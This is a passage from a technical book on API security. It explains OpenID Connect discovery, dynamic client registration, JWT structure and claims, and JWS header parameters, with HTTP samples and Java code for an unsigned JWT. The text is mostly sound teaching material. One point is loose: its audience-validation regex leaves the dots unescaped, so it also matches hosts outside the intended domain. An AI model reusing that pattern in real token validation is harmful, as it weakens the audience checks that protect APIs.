fact, the relying party should be able to derive the WebFinger endpoint from the email address. The relying party can then send a query to the WebFinger endpoint to find out which authorization server (or the identity provider) corresponds to Peter (steps 2 and 3). This query is made according to the WebFinger specification. The following shows a sample WebFinger request for peter@ apress.com: GET /.well-known/webfinger?resource=acct:peter@apress.com &rel=http://openid.net/specs/connect/1.0/issuer HTTP/1.1 Host: apress.com Figure 6-2. OpenID Connect Discovery CHAPTEr 6 OPEnID COnnECT (OIDC) 148 The WebFinger request has two key parameters: resource and rel. The resource parameter should uniquely identify the end user, whereas the value of rel is fixed for OpenID Connect and must be equal to http://openid.net/specs/connect/1.0/ issuer. The rel (relation-type) parameter acts as a filter to determine the OpenID Connect issuer corresponding to the given resource. A WebFinger endpoint can accept many other discovery requests for different services. If it finds a matching entry, the following response is returned to the OpenID Connect relying party. The value of the OpenID identity provider or the authorization server endpoint is included in the response: HTTP/1.1 200 OK Access-Control-Allow-Origin: * Content-Type: application/jrd+json { "subject":"acct:peter@apress.com", "links":[ { "rel":"http://openid.net/specs/connect/1.0/issuer", "href":"https://auth.apress.com" } ] } Note neither the WebFinger nor the OpenID Connect Discovery specification mandates the use of the email address as the resource or the end user identifier. It must be a UrI that conforms to the UrI definition in rFC 3986, which can be used to derive the WebFinger endpoint. If the resource identifier is an email address, then it must be prefixed with acct. The acct is a UrI scheme as defined in http://tools.ietf.org/html/ draft-ietf-appsawg-acct-uri- 07. When the acct UrI scheme is being used, everything after the @ sign is treated as the hostname. The WebFinger hostname is derived from an email address as per the acct UrI scheme, which is the part after the @ sign. CHAPTEr 6 OPEnID COnnECT (OIDC) 149 If a UrL is being used as the resource identifier, the hostname (and port number) of the UrL is treated as the WebFinger hostname. If the resource identifier is https://auth.server.com:9443/prabath, then the WebFinger hostname is auth.server.com:9443. Once the endpoint of the identity provider is discovered, that concludes the role of WebFinger. Yet you don’t have enough data to initiate an OpenID Connect authentication request with the corresponding identity provider. You can find more information about the identity provider by talking to its metadata endpoint, which must be a well-known endpoint (steps 4 and 5 in Figure 6-2). After that, for the client application to talk to the authorization server, it must be a registered client application. The client application can talk to the client registration endpoint of the authorization server (steps 6 and 7) to register itself—and then can access the authorize and token endpoints (steps 8 and 9). Note Both the WebFinger and OpenID Connect Discovery specifications use the Defining Well-Known UrIs (http://tools.ietf.org/html/rfc5785) specification to define endpoint locations. The rFC 5785 specification introduces a path prefix called /.well-known/ to identify well-known locations. Most of the time, these locations are metadata endpoints or policy endpoints. The WebFinger specification has the well-known endpoint /.well-known/ webfinger. The OpenID Connect Discovery specification has the well-known endpoint for OpenID provider configuration metadata, /.well-known/openid- configuration. OpenID Connect Identity Provider Metadata An OpenID Connect identity provider, which supports metadata discovery, should host its configuration at the endpoint /.well-known/openid-configuration. In most cases, this is a nonsecured endpoint, which can be accessed by anyone. An OpenID Connect relying party can send an HTTP GET to the metadata endpoint to retrieve the OpenID provider configuration details as follows: GET /.well-known/openid-configuration HTTP/1.1 Host: auth.server.com CHAPTEr 6 OPEnID COnnECT (OIDC) 150 This results in the following JSON response, which includes everything an OpenID Connect relying party needs to know to talk to the OpenID provider or the OAuth authorization server: HTTP/1.1 200 OK Content-Type: application/json { "issuer":"https://auth.server.com", "authorization_endpoint":"https://auth.server.com/connect/authorize", "token_endpoint":"https://auth.server.com/connect/token", "token_endpoint_auth_methods_supported":["client_secret_basic", "private_ key_jwt"], "token_endpoint_auth_signing_alg_values_supported":["RS256", "ES256"], "userinfo_endpoint":"https://auth.sever.com/connect/userinfo", "check_session_iframe":"https://auth.server.com/connect/check_session", "end_session_endpoint":"https://auth.server.com/connect/end_session", "jwks_uri":"https://auth.server.com/jwks.json", "registration_endpoint":"https://auth.server.com/connect/register", "scopes_supported":["openid", "profile", "email", "address", "phone", "offline_access"], "response_types_supported":["code", "code id_token", "id_token", "token id_token"], "acr_values_supported":["urn:mace:incommon:iap:silver", "urn:mace:incommo n:iap:bronze"], "subject_types_supported":["public", "pairwise"], "userinfo_signing_alg_values_supported":["RS256", "ES256", "HS256"], "userinfo_encryption_alg_values_supported":["RSA1_5", "A128KW"], "userinfo_encryption_enc_values_supported":["A128CBC-HS256", "A128GCM"], "id_token_signing_alg_values_supported":["RS256", "ES256", "HS256"], "id_token_encryption_alg_values_supported":["RSA1_5", "A128KW"], "id_token_encryption_enc_values_supported":["A128CBC-HS256", "A128GCM"], "request_object_signing_alg_values_supported":["none", "RS256", "ES256"], "display_values_supported":["page", "popup"], "claim_types_supported":["normal", "distributed"], "claims_supported":["sub", "iss", "auth_time", "acr", "name", "given_name", "family_name", "nickname", CHAPTEr 6 OPEnID COnnECT (OIDC) 151 "profile", "picture", "website","email", "email_verified", "locale", "zoneinfo", "http://example.info/claims/groups"], "claims_parameter_supported":true, "service_documentation":"http://auth.server.com/connect/service_ documentation.html", "ui_locales_supported":["en-US", "fr-CA"] } Note If the endpoint of the discovered identity provider is https://auth. server.com, then the OpenID provider metadata should be available at https://auth.server.com/.well-known/openid-configuration. If the endpoint is https://auth.server.com/openid, then the metadata endpoint is https://auth.server.com/openid/.well-known/openid- configuration. Dynamic Client Registration Once the OpenID provider endpoint is discovered via WebFinger (and all the metadata related to it through OpenID Connect Discovery), the OpenID Connect relying party still needs to have a client ID and a client secret (not under the implicit grant type) registered at the OpenID provider to initiate the authorization grant request or the OpenID Connect authentication request. The OpenID Connect Dynamic Client Registration specification2 facilitates a mechanism to register dynamically OpenID Connect relying parties at the OpenID provider. The response from the OpenID provider metadata endpoint includes the endpoint for client registration under the parameter registration_endpoint. To support dynamic client registrations, this endpoint should accept open registration requests, with no authentication requirements. 2 http://openid.net/specs/openid-connect-registration-1_0.html CHAPTEr 6 OPEnID COnnECT (OIDC) 152 To fight against denial of service (DoS) attacks, the endpoint can be protected with rate limits or with a web application firewall (WAF). To initiate client registration, the OpenID relying party sends an HTTP POST message to the registration endpoint with its own metadata. The following is a sample client registration request: POST /connect/register HTTP/1.1 Content-Type: application/json Accept: application/json Host: auth.server.com { "application_type":"web", "redirect_uris":["https://app.client.org/callback","https://app.client.org/ callback2"], "client_name":"Foo", "logo_uri":"https://app.client.org/logo.png", "subject_type":"pairwise", "sector_identifier_uri":"https://other.client.org /file_of_redirect_uris. json", "token_endpoint_auth_method":"client_secret_basic", "jwks_uri":"https://app.client.org/public_keys.jwks", "userinfo_encrypted_response_alg":"RSA1_5", "userinfo_encrypted_response_enc":"A128CBC-HS256", "contacts":["prabath@wso2.com", "prabath@apache.org"], "request_uris":["https://app.client.org/rf.txt#qpXaRLh_ n93TTR9F252ValdatUQvQiJi5BDub2BeznA"] } In response, the OpenID Connect provider or the authorization server sends back the following JSON message. It includes a client_id and a client_secret: HTTP/1.1 201 Created Content-Type: application/json Cache-Control: no-store Pragma: no-cache { "client_id":"Gjjhj678jhkh89789ew", CHAPTEr 6 OPEnID COnnECT (OIDC) 153 "client_secret":"IUi989jkjo_989klkjuk89080kjkuoikjkUIl", "client_secret_expires_at":2590858900, "registration_access_token":"this.is.an.access.token.value.ffx83", "registration_client_uri":"https://auth.server.com/connect/register?client_ id=Gjjhj678jhkh89789ew ", "token_endpoint_auth_method":"client_secret_basic", "application_type": "web", "redirect_uris":["https://app.client.org/callback","https://app.client.org/ callback2"], "client_name":"Foo", "logo_uri":"https://client.example.org/logo.png", "subject_type":"pairwise", "sector_identifier_uri":"https://other.client.org/file_of_redirect_uris. json", "jwks_uri":"https://app.client.org/public_keys.jwks", "userinfo_encrypted_response_alg":"RSA1_5", "userinfo_encrypted_response_enc":"A128CBC-HS256", "contacts":["prabath@wso2.com", "prabath@apache.org"], "request_uris":["https://app.client.org/rf.txt#qpXaRLh_ n93TTR9F252ValdatUQvQiJi5BDub2BeznA"] } Once the OpenID Connect relying party obtains a client ID and a client secret, it concludes the OpenID Connect Discovery phase. The relying party can now initiate the OpenID Connect authentication request. Note Section 2.0 of the OpenID Connect Dynamic Client registration specification lists all the attributes that can be included in an OpenID Connect client registration request: http://openid.net/specs/openid-connect- registration-1_0.html. OpenID Connect for Securing APIs So far, you have seen a detailed discussion about OpenID Connect. But in reality, how will it help you in securing APIs? The end users can use OpenID Connect to authenticate CHAPTEr 6 OPEnID COnnECT (OIDC) 154 into web applications, mobile applications, and much more. Nonetheless, why would you need OpenID Connect to secure a headless API? At the end of the day, all the APIs are secured with OAuth 2.0, and you need to present an access token to talk to the API. The API (or the policy enforcement component) validates the access token by talking to the authorization server. Why would you need to pass an ID token to an API? OAuth is about delegated authorization, whereas OpenID Connect is about authentication. An ID token is an assertion about your identity, that is, a proof of your identity. It can be used to authenticate into an API. As of this writing, no HTTP binding is defined for JWT. The following example suggests passing the JWT assertion (or the ID token) to a protected API as an access token in the HTTP Authorization header. The ID token, or the signed JWT, is base64-url-encoded in three parts. Each part is separated by a dot (.). The first part up to the first dot is the JWT header. The second part is the JWT body. The third part is the signature. Once the JWT is obtained by the client application, it can place it in the HTTP Authorization header in the manner shown here: POST /employee HTTP/1.1 Content-Type: application/json Accept: application/json Host: resource.server.com Authorization: Bearer eyJhbGciOiljiuo98kljlk2KJl. IUojlkoiaos298jkkdksdosiduIUiopo.oioYJ21sajds { "empl_no":"109082", "emp_name":"Peter John", "emp_address":“Mountain View, CA, USA” } To validate the JWT, the API (or the policy enforcement component) has to extract the JWT assertion from the HTTP Authorization header, base64-url-decode it, and validate the signature to see whether it’s signed by a trusted issuer. In addition, the claims in the JWT can be used for authentication and authorization. CHAPTEr 6 OPEnID COnnECT (OIDC) 155 Note When an OpenID Connect identity provider issues an ID token, it adds the aud parameter to the token to indicate the audience of the token. This can be an array of identifiers. When using ID tokens to access APIs, a UrI known to the API should also be added to the aud parameter. Currently this can’t be requested in the OpenID Connect authentication request, so it must be set out of band at the OpenID Connect identity provider. Summary • OpenID Connect was built on top of OAuth 2.0. It introduces an identity layer on top of OAuth 2.0. This identity layer is abstracted into an ID token, which is a JSON Web Token (JWT). • OpenID Connect evolved from OpenID to an OAuth 2.0 profile. • The OpenID Connect Dynamic Client Registration specification facilitates a mechanism to register dynamically OpenID Connect relying parties at the OpenID provider. • OpenID Connect defines two ways to request user attributes. The client application can either use the initial OpenID Connect authentication request to request attributes or else later talk to the UserInfo endpoint hosted by the authorization server. • OpenID Connect utilizes the WebFinger protocol in its discovery process along with OpenID Connect dynamic client registration and identity provider metadata configuration. • An OpenID Connect identity provider, which supports metadata discovery, should host its configuration at the endpoint /.well- known/openid-configuration. CHAPTEr 6 OPEnID COnnECT (OIDC) 157 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_7 CHAPTER 7 Message-Level Security with JSON Web Signature JavaScript Object Notation (JSON) provides a way of exchanging data in a language- neutral, text-based, and lightweight manner. It was originally derived from the ECMAScript programming language. JSON and XML are the most commonly used data exchange formats for APIs. Observing the trend over the last few years, it’s quite obvious that JSON is replacing XML. Most of the APIs out there have support for JSON, and some support both JSON and XML. XML-only APIs are quite rare. Understanding JSON Web Token (JWT) JSON Web Token (JWT) defines a container to transport data between interested parties in JSON. It became an IETF standard in May 2015 with the RFC 7519. The OpenID Connect specification, which we discussed in Chapter 6, uses a JWT to represent the ID token. Let’s examine an OpenID Connect ID token returned from the Google API, as an example (to understand JWT, you do not need to know about OpenID Connect): eyJhbGciOiJSUzI1NiIsImtpZCI6Ijc4YjRjZjIzNjU2ZGMzOTUzNjRmMWI2YzAyOTA3 NjkxZjJjZGZmZTEifQ.eyJpc3MiOiJhY2NvdW50cy5nb29nbGUuY29tIiwic3ViIjoiMT EwNTAyMjUxMTU4OTIwMTQ3NzMyIiwiYXpwIjoiODI1MjQ5ODM1NjU5LXRlOHF nbDcwMWtnb25ub21ucDRzcXY3ZXJodTEyMTFzLmFwcHMuZ29vZ2xldXNlcmNvb nRlbnQuY29tIiwiZW1haWwiOiJwcmFiYXRoQHdzbzIuY29tIiwiYXRfaGFzaCI6InpmO DZ2TnVsc0xCOGdGYXFSd2R6WWciLCJlbWFpbF92ZXJpZmllZCI6dHJ1ZSwiYXVkI joiODI1MjQ5ODM1NjU5LXRlOHFnbDcwMWtnb25ub21ucDRzcXY3ZXJodTEyMTFz LmFwcHMuZ29vZ2xldXNlcmNvbnRlbnQuY29tIiwiaGQiOiJ3c28yLmNvbSIsImlhdCI6 MTQwMTkwODI3MSwiZXhwIjoxNDAxOTEyMTcxfQ.TVKv-pdyvk2gW8sGsCbsnkq 158 srS0T-H00xnY6ETkIfgIxfotvFn5IwKm3xyBMpy0FFe0Rb5Ht8AEJV6PdWyxz8rMgX 2HROWqSo_RfEfUpBb4iOsq4W28KftW5H0IA44VmNZ6zU4YTqPSt4TPhyFC9fP2D _Hg7JQozpQRUfbWTJI Note Way before JWT, in 2009, Microsoft introduced Simple Web Token (SWT).1 It is neither JSON nor XML. It defined its own token format to carry out a set of HTML form–encoded name/value pairs. Both JWTs and SWTs define a way to carry claims between applications. In SWT, both the claim names and claim values are strings, while in JWT claim names are strings, but claim values can be any JSON type. Both of these token types offer cryptographic protection for their content: SWTs with HMAC SHA256 and JWTs with a choice of algorithms, including signature, MAC, and encryption algorithms. Even though SWT was developed as a proposal for IETF, it never became an IETF proposed standard. Dick Hardt was the editor of the SWT specification, who also played a major role later in building the OAuth WRAP specification, which we discuss in Appendix B. JOSE Header The preceding JWT has three main elements. Each element is base64url-encoded and separated by a period (.). Appendix E explains how base64url encoding works in detail. Let’s identify each individual element in the JWT. The first element of the JWT is called the JavaScript Object Signing and Encryption (JOSE) header. The JOSE header lists out the properties related to the cryptographic operations applied on the JWT claims set (which we explain later in this chapter). The following is the base64url-encoded JOSE header of the preceding JWT: eyJhbGciOiJSUzI1NiIsImtpZCI6Ijc4YjRjZjIzNjU2ZGMzOTUzNjRmMWI2YzAyOTA3 NjkxZjJjZGZmZTEifQ To make the JOSE header readable, we need to base64url-decode it. The following shows the base64url-decoded JOSE header, which defines two attributes, the algorithm (alg) and key identifier (kid). {"alg":"RS256","kid":"78b4cf23656dc395364f1b6c02907691f2cdffe1"} 1 Simple Web Token, http://msdn.microsoft.com/en-us/library/hh781551.aspx CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 159 Both the alg and kid parameters are not defined in the JWT specification, but in the JSON Web Signature (JWS) specification. Let’s briefly identify here what these parameters mean and will discuss in detail when we explain JWS. The JWT specification is not bound to any specific algorithm. All applicable algorithms are defined under the JSON Web Algorithms (JWA) specification, which is the RFC 7518. Section 3.1 of RFC 7518 defines all possible alg parameter values for a JWS token. The value of the kid parameter provides an indication or a hint about the key, which is used to sign the message. Looking at the kid, the recipient of the message should know where to look up for the key and find it. The JWT specification only defines two parameters in the JOSE header; the following lists out those: • typ (type): The typ parameter is used to define the media type of the complete JWT. A media type is an identifier, which defines the format of the content, transmitted over the Internet. There are two types of components that process a JWT: the JWT implementations and JWT applications. Nimbus2 is a JWT implementation in Java. The Nimbus library knows how to build and parse a JWT. A JWT application can be anything, which uses JWTs internally. A JWT application uses a JWT implementation to build or parse a JWT. The typ parameter is just another parameter for the JWT implementation. It will not try to interpret the value of it, but the JWT application would. The typ parameter helps JWT applications to differentiate the content of the JWT when the values that are not JWTs could also be present in an application data structure along with a JWT object. This is an optional parameter, and if present for a JWT, it is recommended to use JWT as the media type. • cty (content type): The cty parameter is used to define the structural information about the JWT. It is only recommended to use this parameter in the case of a nested JWT. The nested JWTs are discussed in Chapter 8, and the definition of the cty parameter is further explained there. 2 Nimbus JWT Java implementation, http://connect2id.com/products/nimbus-jose-jwt CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 160 JWT Claims Set The second element of the JWT is known as either the JWT payload or the JWT claims set. It is a JSON object, which carries the business data. The following is the base64url- encoded JWT claims set of the preceding JWT (which is returned from the Google API); it includes information about the authenticated user: eyJpc3MiOiJhY2NvdW50cy5nb29nbGUuY29tIiwic3ViIjoiMTEwNTAyMjUxMTU4OT IwMTQ3NzMyIiwiYXpwIjoiODI1MjQ5ODM1NjU5LXRlOHFnbDcwMWtnb25ub21uc DRzcXY3ZXJodTEyMTFzLmFwcHMuZ29vZ2xldXNlcmNvbnRlbnQuY29tIiwiZW1ha WwiOiJwcmFiYXRoQHdzbzIuY29tIiwiYXRfaGFzaCI6InpmODZ2TnVsc0xCOGdGYX FSd2R6WWciLCJlbWFpbF92ZXJpZmllZCI6dHJ1ZSwiYXVkIjoiODI1MjQ5ODM1NjU 5LXRlOHFnbDcwMWtnb25ub21ucDRzcXY3ZXJodTEyMTFzLmFwcHMuZ29vZ2xld XNlcmNvbnRlbnQuY29tIiwiaGQiOiJ3c28yLmNvbSIsImlhdCI6MTQwMTkwODI3MS wiZXhwIjoxNDAxOTEyMTcxfQ To make the JWT claims set readable, we need to base64url-decode it. The following shows the base64url-decoded JWT claims set. Whitespaces can be explicitly retained while building the JWT claims set—no canonicalization is required before base64url- encoding. Canonicalization is the process of converting different forms of a message into a single standard form. This is used mostly before signing XML messages. In XML, the same message can be represented in different forms to carry the same meaning. For example, <vehicles><car></car></vehicles> and <vehicles><car/></vehicles> are equivalent in meaning, but have two different canonical forms. Before signing an XML message, you should follow a canonicalization algorithm to build a standard form. { "iss":"accounts.google.com", "sub":"110502251158920147732", "azp":"825249835659-te8qgl701kgonnomnp4sqv7erhu1211s.apps. googleusercontent.com", "email":"prabath@wso2.com", "at_hash":"zf86vNulsLB8gFaqRwdzYg", "email_verified":true, "aud":"825249835659-te8qgl701kgonnomnp4sqv7erhu1211s.apps. googleusercontent.com", CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 161 "hd":"wso2.com", "iat":1401908271, "exp":1401912171 } The JWT claims set represents a JSON object whose members are the claims asserted by the JWT issuer. Each claim name within a JWT must be unique. If there are duplicate claim names, then the JWT parser could either return a parsing error or just return back the claims set with the very last duplicate claim. JWT specification does not explicitly define what claims are mandatory and what are optional. It’s up to each application of JWT to define mandatory and optional claims. For example, the OpenID Connect specification, which we discussed in detail in Chapter 6, defines the mandatory and optional claims. The JWT specification defines three classes of claims: registered claims, public claims, and private claims. The registered claims are registered in the Internet Assigned Numbers Authority (IANA) JSON Web Token Claims registry. Even though these claims are treated as registered claims, the JWT specification doesn’t mandate their usage. It’s totally up to the other specifications which are built on top of JWT to decide which are mandatory and which aren’t. For example, in OpenID Connect specification, iss is a mandatory claim. The following lists out the registered claims set as defined by the JWT specification: • iss (issuer): The issuer of the JWT. This is treated as a case-sensitive string value. Ideally, this represents the asserting party of the claims set. If Google issues the JWT, then the value of iss would be accounts.google.com. This is an indication to the receiving party who the issuer of the JWT is. • sub (subject): The token issuer or the asserting party issues the JWT for a particular entity, and the claims set embedded into the JWT normally represents this entity, which is identified by the sub parameter. The value of the sub parameter is a case-sensitive string value. • aud (audience): The token issuer issues the JWT to an intended recipient or a list of recipients, which is represented by the aud parameter. The recipient or the recipient list should know how to parse the JWT and validate it. Prior to any validation check, it must first see whether the particular JWT is issued for its use and if not should reject immediately. The value of the aud parameter can be a case-sensitive string value or an array of strings. The token issuer should know, prior to issuing the token, who the intended CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 162 recipient (or the recipients) of the token is, and the value of the aud parameter must be a pre-agreed value between the token issuer and the recipient. In practice, one can also use a regular expression to validate the audience of the token. For example, the value of the aud in the token can be *.apress.com, while each recipient under the apress.com domain can have its own aud values: foo.apress. com, bar.apress.com likewise. Instead of finding an exact match for the aud value, each recipient can just check whether the aud value matches the regular expression: (?:[a-zA-Z0-9]*|\*).apress.com. This will make sure that any recipient can use a JWT, which is having any subdomain of apress.com. • exp (expiration time): Each JWT carries an expiration time. The recipient of the JWT token must reject it, if that token has expired. The issuer can decide the value of the expiration time. The JWT specification does not recommend or provide any guidelines on how to decide the best token expiration time. It’s a responsibility of the other specifications, which use JWT internally to provide such recommendations. The value of the exp parameter is calculated by adding the expiration time (from the token issued time) in seconds to the time elapsed from 1970-01-01T00:00:00Z UTC to the current time. If the token issuer’s clock is out of sync with the recipient’s clock (irrespective of their time zone), then the expiration time validation could fail. To fix that, each recipient can add a couple of minutes as the clock skew during the validation process. • nbf (not before): The recipient of the token should reject it, if the value of the nbf parameter is greater than the current time. The JWT is not good enough to use prior to the value indicated in the nbf parameter. The value of the nbf parameter is the number of seconds elapsed from 1970-01-01T00:00:00Z UTC to the not before time. • iat (issued at): The iat parameter in the JWT indicates the issued time of the JWT as calculated by the token issuer. The value of the iat parameter is the number of seconds elapsed from 1970-01-01T00:00:00Z UTC to the current time, when the token is issued. CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 163 • jti (JWT ID): The jti parameter in the JWT is a unique token identifier generated by the token issuer. If the token recipient accepts JWTs from multiple token issuers, then this value may not be unique across all the issuers. In that case, the token recipient can maintain the token uniqueness by maintaining the tokens under the token issuer. The combination of the token issuer identifier + the jti should produce a unique token identifier. The public claims are defined by the other specifications, which are built on top of JWT. To avoid any collisions in such cases, names should either be registered in the IANA JSON Web Token Claims registry or defined in a collision-resistant manner with a proper namespace. For example, the OpenID Connect specification defines its own set of claims, which are included inside the ID token (the ID token itself is a JWT), and those claims are registered in the IANA JSON Web Token Claims registry. The private claims should indeed be private and shared only between a given token issuer and a selected set of recipients. These claims should be used with caution, because there is a chance for collision. If a given recipient accepts tokens from multiple token issuers, then the semantics of the same claim may be different from one issuer to another, if it is a private claim. JWT Signature The third part of the JWT is the signature, which is also base64url-encoded. The cryptographic parameters related to the signature are defined in the JOSE header. In this particular example, Google uses RSASSA-PKCS1-V1_53 with the SHA256 hashing algorithm, which is expressed by value of the alg parameter in the JOSE header: RS256. The following shows the signature element of the JWT returned back from Google. The signature itself is not human readable—so there is no point of trying to base64url-decode the following: TVKv-pdyvk2gW8sGsCbsnkqsrS0TH00xnY6ETkIfgIxfotvFn5IwKm3xyBMpy0 FFe0Rb5Ht8AEJV6PdWyxz8rMgX2HROWqSo_RfEfUpBb4iOsq4W28KftW5 H0IA44VmNZ6zU4YTqPSt4TPhyFC-9fP2D_Hg7JQozpQRUfbWTJI 3 RSASSA-PKCS1-V1_5 is defined in RFC 3447: www.ietf.org/rfc/rfc3447.txt. It uses the signer’s RSA private key to sign the message in the way defined by PKCS#1. CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 164 GENERATING A PLAINTEXT JWT The plaintext JWT doesn’t have a signature. It has only two parts. The value of the alg parameter in the JOSE header must be set to none. The following Java code generates a plaintext JWT. you can download the complete Java sample as a Maven project from https://github.com/apisecurity/samples/tree/master/ch07/sample01. public static String buildPlainJWT() { // build audience restriction list. List<String> aud = new ArrayList<String>(); aud.add("https://app1.foo.com"); aud.add("https://app2.foo.com"); Date currentTime = new Date(); // create a claims set. JWTClaimsSet jwtClaims = new JWTClaimsSet.Builder(). // set the value of the issuer. issuer("https://apress.com"). // set the subject value - JWT belongs to // this subject. subject("john"). // set values for audience restriction. audience(aud). // expiration time set to 10 minutes. expirationTime(new Date(new Date().getTime() + 1000 * 60 * 10)). // set the valid from time to current time. notBeforeTime(currentTime). // set issued time to current time. issueTime(currentTime). // set a generated UUID as the JWT // identifier. jwtID(UUID.randomUUID().toString()). build(); CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 165 // create plaintext JWT with the JWT claims. PlainJWT plainJwt = new PlainJWT(jwtClaims); // serialize into string. String jwtInText = plainJwt.serialize(); // print the value of the JWT. System.out.println(jwtInText); return jwtInText; } To build and run the program, execute the following Maven command from the ch07/ sample01 directory. \> mvn test -Psample01 The preceding code produces the following output, which is a JWT. If you run the code again and again, you may not get the same output as the value of the currentTime variable changes every time you run the program: eyJhbGciOiJub25lIn0.eyJleHAiOjE0MDIwMzcxNDEsInN1YiI6ImpvaG4iLCJuYm YiOjE0MDIwMzY1NDEsImF1ZCI6WyJodHRwczpcL1wvYXBwMS5mb28uY29tIi wiaHR0cHM6XC9cL2FwcDIuZm9vLmNvbSJdLCJpc3MiOiJodHRwczpcL1wvYX ByZXNzLmNvbSIsImp0aSI6IjVmMmQzM2RmLTEyNDktNGIwMS04MmYxLWJl MjliM2NhOTY4OSIsImlhdCI6MTQwMjAzNjU0MX0. The following Java code shows how to parse a base64url-encoded JWT. This code would ideally run at the JWT recipient end: public static PlainJWT parsePlainJWT() throws ParseException { // get JWT in base64url-encoded text. String jwtInText = buildPlainJWT(); // build a plain JWT from the bade64url-encoded text. PlainJWT plainJwt = PlainJWT.parse(jwtInText); // print the JOSE header in JSON. System.out.println(plainJwt.getHeader().toString()); // print JWT body in JSON. System.out.println(plainJwt.getPayload().toString()); return plainJwt; } CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 166 This code produces the following output, which includes the parsed JOSE header and the payload: {"alg":"none"} { "exp":1402038339, "sub":"john", "nbf":1402037739, "aud":["https:\/\/app1.foo.com","https:\/\/app2.foo.com"], "iss":"https:\/\/apress.com", "jti":"1e41881f-7472-4030-8132-856ccf4cbb25", "iat":1402037739 } JOSE WORKING GROUP Many working groups within the IETF work directly with JSON, including the OAuth working group and the System for Cross-domain Identity Management (SCIM) working group. The SCIM working group is building a provisioning standard based on JSON. Outside the IETF, the OASIS XACML working group is working on building a JSON profile for XACML 3.0. The OpenID Connect specification, which is developed under the OpenID Foundation, is also heavily based on JSON. Due to the rise of standards built around JSON and the heavy usage of JSON for data exchange in APIs, it has become absolutely necessary to define how to secure JSON messages at the message level. The use of Transport Layer Security (TLS) only provides confidentiality and integrity at the transport layer. The JOSE working group, formed under the IETF, has the goal of standardizing integrity protection and confidentiality as well as the format for keys and algorithm identifiers to support interoperability of security services for protocols that use JSON. JSON Web Signature (RFC 7515), JSON Web Encryption (RFC 7516), JSON Web Key (RFC 7517), and JSON Web Algorithms (RFC 7518) are four IETF proposed standards, which were developed under the JOSE working group. CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 167 JSON Web Signature (JWS) The JSON Web Signature (JWS) specification, developed under the IETF JOSE working group, represents a message or a payload, which is digitally signed or MACed (when a hashing algorithm is used with HMAC). A signed message can be serialized in two ways by following the JWS specification: the JWS compact serialization and the JWS JSON serialization. The Google OpenID Connect example discussed at the beginning of this chapter uses JWS compact serialization. In fact, the OpenID Connect specification mandates to use JWS compact serialization and JWE compact serialization whenever necessary (we discuss JWE in Chapter 8). The term JWS token is used to refer to the serialized form of a payload, following any of the serialization techniques defined in the JWS specification. Note JSON Web Tokens (JWTs) are always serialized with the JWS compact serialization or the JWE compact serialization. We discuss JWE (JSON Web Encryption) in Chapter 8. JWS Compact Serialization JWS compact serialization represents a signed JSON payload as a compact URL-safe string. This compact string has three main elements separated by periods (.): the JOSE header, the JWS payload, and the JWS signature (see Figure 7-1). If you use compact serialization against a JSON payload, then you can have only a single signature, which is computed over the complete JOSE header and JWS payload. JOSE Header The JWS specification introduces 11 parameters to the JOSE header. The following lists out the parameters carried in a JOSE header, which are related to the message Figure 7-1. A JWS token with compact serialization CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 168 signature. Out of all those parameters, the JWT specification only defines the typ and cty parameters (as we discussed before); the rest is defined by the JWS specification. The JOSE header in a JWS token carries all the parameters required by the JWS token recipient to properly validate its signature: • alg (algorithm): The name of the algorithm, which is used to sign the JSON payload. This is a required attribute in the JOSE header. Failure to include this in the header will result in a token parsing error. The value of the alg parameter is a string, which is picked from the JSON Web Signature and Encryption Algorithms registry defined by the JSON Web Algorithms (JWA) specification. If the value of the alg parameter is not picked from the preceding registry, then it should be defined in a collision-resistant manner, but that won’t give any guarantee that the particular algorithm is identified by all JWS implementations. It’s always better to stick to the algorithms defined in the JWA specification. • jku: The jku parameter in the JOSE header carries a URL, which points to a JSON Web Key (JWK) set. This JWK set represents a collection of JSON-encoded public keys, where one of the keys is used to sign the JSON payload. Whatever the protocol used to retrieve the key set should provide the integrity protection. If keys are retrieved over HTTP, then instead of plain HTTP, HTTPS (or HTTP over TLS) should be used. We discuss Transport Layer Security (TLS) in detail in Appendix C. The jku is an optional parameter. • jwk: The jwk parameter in JOSE header represents the public key corresponding to the key that is used to sign the JSON payload. The key is encoded as per the JSON Web Key (JWK) specification. The jku parameter, which we discussed before, points to a link that holds a set of JWKs, while the jwk parameter embeds the key into the JOSE header itself. The jwk is an optional parameter. • kid: The kid parameter of the JOSE header represents an identifier for the key that is used to sign the JSON payload. Using this identifier, the recipient of the JWS should be able locate the key. If the token issuer uses the kid parameter in the JOSE header to let the recipient know about the signing key, then the corresponding key should be CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 169 exchanged “somehow” between the token issuer and the recipient beforehand. How this key exchange happens is out of the scope of the JWS specification. If the value of the kid parameter refers to a JWK, then the value of this parameter should match the value of the kid parameter in the JWK. The kid is an optional parameter in the JOSE header. • x5u: The x5u parameter in the JOSE header is very much similar to the jku parameter, which we discussed before. Instead of pointing to a JWK set, the URL here points to an X.509 certificate or a chain of X.509 certificates. The resource pointed by the URL must hold the certificate or the chain of certificates in the PEM- encoded form. Each certificate in the chain must appear between the delimiters4: -----BEGIN CERTIFICATE----- and -----END CERTIFICATE-----. The public key corresponding to the key used to sign the JSON payload should be the very first entry in the certificate chain, and the rest is the certificates of intermediate CAs (certificate authority) and the root CA. The x5u is an optional parameter in the JOSE header. • x5c: The x5c parameter in the JOSE header represents the X.509 certificate (or the certificate chain), which corresponds to the private key, which is used to sign the JSON payload. This is similar to the jwk parameter we discussed before, but in this case, instead of a JWK, it’s an X.509 certificate (or a chain of certificates). The certificate or the certificate chain is represented in a JSON array of certificate value strings. Each element in the array should be a base64-encoded DER PKIX certificate value. The public key corresponding to the key used to 